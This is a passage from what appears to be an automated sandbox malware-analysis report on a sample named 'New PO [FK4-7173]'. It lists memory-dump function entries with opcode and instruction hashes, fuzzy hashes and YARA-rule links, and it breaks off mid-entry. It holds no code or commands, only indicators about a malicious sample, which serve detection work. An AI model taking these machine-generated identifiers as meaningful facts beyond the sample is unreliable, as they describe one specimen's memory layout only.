                                                                          • Opcode Fuzzy Hash: 52ac630dea8a55d7c84eaee11fb55bda901fd43134fc6cbda82d35067dc69918
                                                                          • Instruction Fuzzy Hash: C6E06D72B041286F9304DA6EEC84C6BBBEDFBCC671311807AF908C7350DA319C0086E0
                                                                          Function 04B7EB34 Relevance: .0, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5d8145c3911de704b1924cf1418adffa835ffbd04b4c9599709d6fc890b9b47a
                                                                          • Instruction ID: 65e005d4293729642e32d4c6a6657238b335e0e74bf4d00de19ae6be635df0dd
                                                                          • Opcode Fuzzy Hash: 5d8145c3911de704b1924cf1418adffa835ffbd04b4c9599709d6fc890b9b47a
                                                                          • Instruction Fuzzy Hash: 25F06D75B04154DFDB00CB68D8946A8BBB0FF46305F0440D6E556DB272DB34A845CB10
                                                                          Function 04B70C70 Relevance: .0, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ca6328a9ad025548aba9964efe8f9a69f42fd6ab7c2cd87a3c6958bd9027955c
                                                                          • Instruction ID: 5b08d1d2c760b08064a7c6cafed26f232118d5db8cc5c78e8ea18fd44a905928
                                                                          • Opcode Fuzzy Hash: ca6328a9ad025548aba9964efe8f9a69f42fd6ab7c2cd87a3c6958bd9027955c
                                                                          • Instruction Fuzzy Hash: 9FE06D71B01A244BAB0CFB7EA40086AFADBEFC8618304C1AFD50D87725ED30A8018684
                                                                          Function 04B7B980 Relevance: .0, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e3acadc9db8819bb77607a32aeec721ae737c0a95525d21529641e5605b68d76
                                                                          • Instruction ID: 11335f6f89303cf5196b6746db5f264b1a2f70a27ef7b8165cc33544731c0c87
                                                                          • Opcode Fuzzy Hash: e3acadc9db8819bb77607a32aeec721ae737c0a95525d21529641e5605b68d76
                                                                          • Instruction Fuzzy Hash: EDF0DF34200610CFC718DB2CD588D59BBE6FF4AB1971545A9E55ACB332CBB2EC40CB80
                                                                          Function 0705CA97 Relevance: .0, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ea4119dfa8f5eecd32822c00200741c0a3547bb507cd721590288723f8364ceb
                                                                          • Instruction ID: 4090c66d14347285fdbec7ad67cffefde270c2cccd9c8f02a4f8bf792c991c90
                                                                          • Opcode Fuzzy Hash: ea4119dfa8f5eecd32822c00200741c0a3547bb507cd721590288723f8364ceb
                                                                          • Instruction Fuzzy Hash: 66F03AB0A00209DBCB04DF69D544A9EFFF1EF84304F14C2A5E8049B211E7348E41DB80
                                                                          Function 0705CA98 Relevance: .0, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 86aa28e0c2f95d5092c49742752761ac741d048feb8e627d28b572d5b0767a63
                                                                          • Instruction ID: 80a0ec7a8fb4b1acfbc2c210f47da2b6c37a63cbfaadf3ddcc7ddf725c9a5a0f
                                                                          • Opcode Fuzzy Hash: 86aa28e0c2f95d5092c49742752761ac741d048feb8e627d28b572d5b0767a63
                                                                          • Instruction Fuzzy Hash: E3F05EB0A00209DBCB04DF69D544A9EFFF5FF84304F14C2A5E8049B211E7349E41DB90
                                                                          Function 04B77CA8 Relevance: .0, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 16072c9c77381c0bb9909a36d2065ec87dd038a94edebadf479abc8bbe60eb13
                                                                          • Instruction ID: 2dd771479c187fa5618810469ddeaa8d8fa3c6c8ad6db7b45f60743ce1bca16e
                                                                          • Opcode Fuzzy Hash: 16072c9c77381c0bb9909a36d2065ec87dd038a94edebadf479abc8bbe60eb13
                                                                          • Instruction Fuzzy Hash: 3EE08672B001182FAB08DEBA9C409AFBFEEDB84194B10C0B9D519E3304FE30BD018790
                                                                          Function 0705E857 Relevance: .0, Instructions: 26COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9b59f28fa348ab027c742d6333ba649393acb6845d1a3670a4b1069cf00c5892
                                                                          • Instruction ID: 8eaccd1eda31d6fa7646d1baa43ba15d4d323be5ab7bf681177adac51f94b4dd
                                                                          • Opcode Fuzzy Hash: 9b59f28fa348ab027c742d6333ba649393acb6845d1a3670a4b1069cf00c5892
                                                                          • Instruction Fuzzy Hash: F4F06DFA9041549FCB51DF64D9858E9BBB0FF5A71471482C5D8884B232D6309A07DF52
                                                                          Function 04B76AF8 Relevance: .0, Instructions: 26COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b935561bc3738f435e1d88c56c324f52ae6e81d48ccbaef56b0bca722f818a56
                                                                          • Instruction ID: d72e3f3daf1c78101a3dbf8ca6fd8c6df8c86088991d30b367ebd60462f1b44e
                                                                          • Opcode Fuzzy Hash: b935561bc3738f435e1d88c56c324f52ae6e81d48ccbaef56b0bca722f818a56
                                                                          • Instruction Fuzzy Hash: 29F0E574905348AFC701EBA4E40099C7FB5FB01209B204495E841D7355D7326E049B61
                                                                          Function 04B78BA0 Relevance: .0, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 85ba9cc1876886fb4eca626f4f1f55af75f98ff8cf0a4cdccecaeac821fcc14d
                                                                          • Instruction ID: a0f8eb3df9304501cbdbd0e2e5e38f8d412e994da910e7f7463515bc8a2f5003
                                                                          • Opcode Fuzzy Hash: 85ba9cc1876886fb4eca626f4f1f55af75f98ff8cf0a4cdccecaeac821fcc14d
                                                                          • Instruction Fuzzy Hash: E4E026602083014BE3063B70A4093643B6AFB9164678A8099A485CB2A2CA2DEC46A312
                                                                          Function 04B7978A Relevance: .0, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6b9340f9335698a58b6f5077728ae028808ef17245200d5d9bad7378c8241fee
                                                                          • Instruction ID: ef32a229764c6fe06591fb009a76dcf879d833e478a2466d3a8b49dba77078e4
                                                                          • Opcode Fuzzy Hash: 6b9340f9335698a58b6f5077728ae028808ef17245200d5d9bad7378c8241fee
                                                                          • Instruction Fuzzy Hash: 15E0C2703006009FC728CF5CE440A8977FADF8872032486A9F04AC7221DA60FC064780
                                                                          Function 04B71C84 Relevance: .0, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0b21f18c619a4d49933437cc94b9fd229df1b5c4bdee229346d9cb196ab4256f
                                                                          • Instruction ID: 5bce98b5c05858a36b305d20e77a7e1dcf10c4b58a39293a9bbd22c219ca9f9b
                                                                          • Opcode Fuzzy Hash: 0b21f18c619a4d49933437cc94b9fd229df1b5c4bdee229346d9cb196ab4256f
                                                                          • Instruction Fuzzy Hash: F1E0C2B03147049FD758DF1CE8808AA73FAEF897103208DAAF009C3220DB60FC044688
                                                                          Function 04B70C60 Relevance: .0, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 524b2dbff8405ab9436aab2b9496480b019ca942525a78f6cbfa4d404de307ad
                                                                          • Instruction ID: 2aae14b2ebbecd1209cca3154f709dc176bf9330c9864191c3eb2aac356b99f4
                                                                          • Opcode Fuzzy Hash: 524b2dbff8405ab9436aab2b9496480b019ca942525a78f6cbfa4d404de307ad
                                                                          • Instruction Fuzzy Hash: D9E086B16015208FD718EB3DA440AA7B7D7FFC461470486AED54AC7714D931BC01CB84
                                                                          Function 04B7311C Relevance: .0, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b654a39c0cd9ac90a3912545084d34cd19457374b7a8dcb616cfc367a36376e8
                                                                          • Instruction ID: 11933fa1021a1333b99af987c13c596dabaf3dc981cafc52538c5a04ef488d18
                                                                          • Opcode Fuzzy Hash: b654a39c0cd9ac90a3912545084d34cd19457374b7a8dcb616cfc367a36376e8
                                                                          • Instruction Fuzzy Hash: D5F0F235A00148CBCF08EBA4D5445DCB3B1EB48256F2000A5C829B2650CB326E50DB20
                                                                          Function 04B71690 Relevance: .0, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bd5f1d2ca8e1204794801f39cce4520e0526a963134becc3d40c2c45e6d01bf8
                                                                          • Instruction ID: dbf743616ed500bb7677e6605b5b44acb58b03418637ede1ca98ebb117aa7fa8
                                                                          • Opcode Fuzzy Hash: bd5f1d2ca8e1204794801f39cce4520e0526a963134becc3d40c2c45e6d01bf8
                                                                          • Instruction Fuzzy Hash: 7AE0867630D6506FD7018724D4148997FA9DF1B62030580A7F545C7362CA65EC10D7A2
                                                                          Function 07054E69 Relevance: .0, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b8c260ce57f3f8a197fc80a17b2dc3c1ee41aca8509b971822374da0238c4360
                                                                          • Instruction ID: 3bf91eb63b8cea13c2744f7a25f661655eff7585d631a08da84afa0285aae61b
                                                                          • Opcode Fuzzy Hash: b8c260ce57f3f8a197fc80a17b2dc3c1ee41aca8509b971822374da0238c4360
                                                                          • Instruction Fuzzy Hash: 8FE0CDBA41C3CA5ACB07A33568546457F76FA4210937506C6F85547067EB5C186D83E1
                                                                          Function 04B76B08 Relevance: .0, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2191748334e97b32cd2bb0a02ad38d02802158bfc0618759a5332e4b9c62bd84
                                                                          • Instruction ID: 91270382ec7bc02e12e5cf9e1a610eed18d55eceac00906349beda96d3b91903
                                                                          • Opcode Fuzzy Hash: 2191748334e97b32cd2bb0a02ad38d02802158bfc0618759a5332e4b9c62bd84
                                                                          • Instruction Fuzzy Hash: 97E04F74A00208EFC704FFA4E50186CBBB5EB44205B208555EC0497254DB322F05AF65
                                                                          Function 0705DF2F Relevance: .0, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 685a60093a74e5e943e09d25bf55994da09c4d56c28e51d4c2f7da386128445a
                                                                          • Instruction ID: 94162eb02c771fa171989fd2dc1d1adad9b7a3b0ff9a449223ed740f29d8a4d5
                                                                          • Opcode Fuzzy Hash: 685a60093a74e5e943e09d25bf55994da09c4d56c28e51d4c2f7da386128445a
                                                                          • Instruction Fuzzy Hash: 81E0C2B1509288DBCB01DAA8E41839A7A78AB01109F0002DAA90843251D7691E00D792
                                                                          Function 0705761F Relevance: .0, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ac74072b9c239918bda3c684ed830cc08505031150f4b588d606ab941e319104
                                                                          • Instruction ID: ee8dc88a618103a09cf9a070e3765b6b58a385d81103cde479d890db76883694
                                                                          • Opcode Fuzzy Hash: ac74072b9c239918bda3c684ed830cc08505031150f4b588d606ab941e319104
                                                                          • Instruction Fuzzy Hash: F2C0807310D1342B9324504E7C849E75B4CC3C12B9E210337F92CC714094424C4252E0
                                                                          Function 04B7C3E0 Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fc04ff43230e3ba5c119bde0d2f4a5cdb9a892d13cd382f1b8c50ae1eff38a3c
                                                                          • Instruction ID: 838e6c4747baa439f0f169ce04172e06075059220f33e145450598696e700308
                                                                          • Opcode Fuzzy Hash: fc04ff43230e3ba5c119bde0d2f4a5cdb9a892d13cd382f1b8c50ae1eff38a3c
                                                                          • Instruction Fuzzy Hash: 79D0123039421AC7EB6C5BA9E459B767BBCEF4071AB0604ECE81EC6500EB26F8929511
                                                                          Function 04B7C3D0 Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 40aed792bbbd7d99ab31cf80fec63c4f35854e9811ecd5249680c34d15088029
                                                                          • Instruction ID: 2db3e3c95cbd264f5043a5c848d3662256dc54c7bb741a339c13ce3c674d6ce4
                                                                          • Opcode Fuzzy Hash: 40aed792bbbd7d99ab31cf80fec63c4f35854e9811ecd5249680c34d15088029
                                                                          • Instruction Fuzzy Hash: 08D0A73824D3928FE7595B74A5695717F38DF0260630A00CDD86AC5043E729B857DB12
                                                                          Function 04B78BB0 Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 42bb06b0b2c0687960dbd4c1381c4bf2fb1c8be029a2e24a6c964b1a080d98ef
                                                                          • Instruction ID: c47755faf00c2604a6e9f296fda1274d803dfe656ef81af3a3fa15afc5cdef4e
                                                                          • Opcode Fuzzy Hash: 42bb06b0b2c0687960dbd4c1381c4bf2fb1c8be029a2e24a6c964b1a080d98ef
                                                                          • Instruction Fuzzy Hash: A1D0A7203042148BA3043EB6E409636339EFB94746B85801C7405C6584DE3CE8429315
                                                                          Function 04B716A0 Relevance: .0, Instructions: 15COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d5dc1bd63e72ae08b5b58d424f979eb941a73f34c21f9a100aa5e55a6fd05211
                                                                          • Instruction ID: 77724fee36eba649cbb16643b07f18b6e2f4099512eabb07b82eb5ab1c59a489
                                                                          • Opcode Fuzzy Hash: d5dc1bd63e72ae08b5b58d424f979eb941a73f34c21f9a100aa5e55a6fd05211
                                                                          • Instruction Fuzzy Hash: 55D0C9763101249F8B049B69E808CA9BBE9EB4D6613118166F909C7321CE71DC109BD4
                                                                          Function 0705DF40 Relevance: .0, Instructions: 13COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6f7a7a6c7ce21c6c202fd311cc9abf9b281756d3b318861c02530dd1f45faec4
                                                                          • Instruction ID: 0c254fa06cfca88a5340b98d8ed68373aa4a21fffeab6384a9caf4c4f37340e7
                                                                          • Opcode Fuzzy Hash: 6f7a7a6c7ce21c6c202fd311cc9abf9b281756d3b318861c02530dd1f45faec4
                                                                          • Instruction Fuzzy Hash: 60C080B150511DDBCB04DF94E5097AE77BCD701215F0012DD990D13350DB751E00D7D6
                                                                          Function 07054E78 Relevance: .0, Instructions: 12COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: be1645e5aa2f69aced2750afe60ebbd6084c9683e83becdcdadcaf9c8a4cf841
                                                                          • Instruction ID: b3c725f79ce346f0473fef62c5c1a1500e3e3e20942efe5b0e97e65bb5c2dda9
                                                                          • Opcode Fuzzy Hash: be1645e5aa2f69aced2750afe60ebbd6084c9683e83becdcdadcaf9c8a4cf841
                                                                          • Instruction Fuzzy Hash: 2AC0123505460D46CA09F775E945915376BFB842447B04A10B8160A129DF7C1D5A56D1
                                                                          Function 0705BDE4 Relevance: .0, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 40cd699f90389ed04172226152c69879c14a6fc65fdc80cb8c61f56e70b5f61f
                                                                          • Instruction ID: 8a5aca03e527c1858480d62f9f111a90cebce27b3f1e3887e55b000a126b4978
                                                                          • Opcode Fuzzy Hash: 40cd699f90389ed04172226152c69879c14a6fc65fdc80cb8c61f56e70b5f61f
                                                                          • Instruction Fuzzy Hash: DAC02BF5025001DFE201A700C840C7B7BA1FF92300F00CC4275C805030C620E418DB02
                                                                          Function 0705A957 Relevance: .0, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ee5d4697bb91d03ad451d7c972b8c9a30abf34acd110aa3dab04782253528523
                                                                          • Instruction ID: c6781463f63ea4572aed0ab9648e294359b1c33b60cff13e06bffaa6f83ba246
                                                                          • Opcode Fuzzy Hash: ee5d4697bb91d03ad451d7c972b8c9a30abf34acd110aa3dab04782253528523
                                                                          • Instruction Fuzzy Hash: EFB022B000220082C200BB80B00C3A0BFB0EB0020AF08A202E80C02000CBBE0802C203
                                                                          Function 0705A958 Relevance: .0, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f76f31380846f9b5fc7d08a4355510f93423947abd8da7774a2bc29ccdb1e55d
                                                                          • Instruction ID: 61322b70c400949d62e1dad0d826010742fd817d7e8a9fa06db64111abf3786e
                                                                          • Opcode Fuzzy Hash: f76f31380846f9b5fc7d08a4355510f93423947abd8da7774a2bc29ccdb1e55d
                                                                          • Instruction Fuzzy Hash: 2AB022B000020882C200B288A80C320BEA8AB0020AF08A202A80C020008BBE0800C22B

                                                                          Non-executed Functions

                                                                          Function 04B42218 Relevance: .3, Instructions: 315COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033372903.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b40000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ee116d56f06deb754433e30546128285dc2af8649454ae6d31c7a41712cc39ef
                                                                          • Instruction ID: 495b96c445c8b6fbfb45b0b75168a1b442c8da6bfd3694bcc8ce2d843f4f02bf
                                                                          • Opcode Fuzzy Hash: ee116d56f06deb754433e30546128285dc2af8649454ae6d31c7a41712cc39ef
                                                                          • Instruction Fuzzy Hash: D2129FF4C01746ABE714CF65E94C1893AB1FBA5328B90820DDE616A2E5DBBC194BCF44
                                                                          Function 05136580 Relevance: .3, Instructions: 312COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 896b68f36334048bb3cfbf65b8f6301c7cb4a71f2166cd004472f964dcec5b19
                                                                          • Instruction ID: 57a6664a88947f788ca683eee702002595b14931e818e0dacc4787a18c11fd59
                                                                          • Opcode Fuzzy Hash: 896b68f36334048bb3cfbf65b8f6301c7cb4a71f2166cd004472f964dcec5b19
                                                                          • Instruction Fuzzy Hash: BCE11574E002199FCB14DFA9C5919AEFBF2BF89304F24C16AD814AB319D730A946CF61
                                                                          Function 05138580 Relevance: .3, Instructions: 312COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dbebf8a91a947207258dec77c6273789323c704172638671a46c259b09cc5897
                                                                          • Instruction ID: dca0d2c5843ea915c1feccbc1aa8c74394a1262b495e3b22014acbdfa5ff5e1c
                                                                          • Opcode Fuzzy Hash: dbebf8a91a947207258dec77c6273789323c704172638671a46c259b09cc5897
                                                                          • Instruction Fuzzy Hash: C0E116B4E011199FCB14DFA9C9909AEFBF2BF89304F248169E814AB355D730A946CF61
                                                                          Function 05136148 Relevance: .3, Instructions: 312COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 384088f9fc1ef3ee43f9d6a1729ebaa397ee4fd9d68975cbd7e886348b365150
                                                                          • Instruction ID: cc375ae93af30acaebb267790c3c03fcd9f9c2c3854e1dc530d2e40e14fc5f00
